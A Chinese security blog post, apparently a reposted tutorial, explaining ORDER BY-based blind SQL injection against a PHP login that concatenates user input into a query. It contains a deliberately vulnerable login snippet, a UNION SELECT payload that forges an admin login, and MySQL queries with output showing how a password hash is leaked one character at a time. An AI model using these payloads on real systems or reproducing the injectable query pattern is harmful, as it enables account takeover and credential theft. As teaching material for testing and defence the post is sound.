利用order by 进行盲注
0x01 利用场景
登录代码:
$username = $_POST['username']; $password = $_POST['password']; if(filter($username)){ //过滤括号 }else{ $sql="SELECT * FROM admin WHERE username='".$username."'"; $result=mysql_query($sql); @$row = mysql_fetch_array($result); if(isset($row) && $row['username'] === 'admin'){ if ($row['password']===md5($password)){ //Login successful }else{ die("password error!"); } }else{ die("username does not exist!"); } }
有下列表:
mysql> select * from admin where username='admin'; +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 | +----+----------+----------------------------------+ 1 row in set (0.00 sec)
这样一个一般的场景,用户登录时,用户名错误提示:用户名错误
,用户名正确密码错误提示:密码错误
0x02 UNION SELECT登录
看到这个逻辑第一想法肯定是直接利用union select
伪造密码登录:
username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1 mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'; +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | admin | c4ca4238a0b923820dcc509a6f75849b | +----+----------+----------------------------------+ 1 row in set (0.00 sec)
但是想得到password
怎么办
0x03 利用order by起飞
由登录提示可获取一个bool条件,如何用order by
利用这个bool条件
mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3; +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | 2 | 5 | | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 | +----+----------+----------------------------------+ 2 rows in set (0.00 sec) mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3; +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 | | 1 | 2 | 6 | +----+----------+----------------------------------+ 2 rows in set (0.01 sec) mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3; +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | 2 | 51 | | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 | +----+----------+----------------------------------+ 2 rows in set (0.00 sec) mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3; +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 | | 1 | 2 | 52 | +----+----------+----------------------------------+ 2 rows in set (0.00 sec)
通过逐位判断便可得到password
显然此方法在实际中使用的不多,但在一些特定的环境中也许会用到,比如实验环境,如果过滤了括号,其他盲注基本上就是废了,便可利用order by
进行注入。
著作权归作者所有。
商业转载请联系作者获得授权,非商业转载请注明出处。
作者:p0
链接:http://p0sec.net/index.php/archives/106/
来源:http://p0sec.net/
By:珍惜少年时博客:http://www.cnblogs.com/xishaonian/
*-------------------------------------------*